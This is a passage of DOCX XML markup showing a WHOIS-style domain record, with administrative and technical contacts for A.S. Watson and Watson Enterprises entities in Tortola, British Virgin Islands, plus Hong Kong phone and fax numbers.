      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Tortola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Postal Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG1110</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Country:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Phone:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Fax:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281705</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Email:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>@ckh.com.hk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="434343"/>
          <w:sz w:val="29"/>
          <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Administrative Contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Domain Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>A.S. Watson TM Limited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Street:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Vistra Corporate Services Centre, Wickhams Cay II, Road Town</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>City:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Tortola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Postal Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG1110</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Country:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Phone:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Fax:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281705</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Email:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>@ckh.com.hk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>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shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="434343"/>
          <w:sz w:val="29"/>
          <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Technical Contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Domain Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Watson Enterprises Limited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Street:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>P.O. Box 146, Trident Chambers, Wickhams Cay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>City:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Road Town</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>State:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Tortola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Postal Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG1110</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Country:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>VG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Phone:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Fax:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>+852.21281705</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
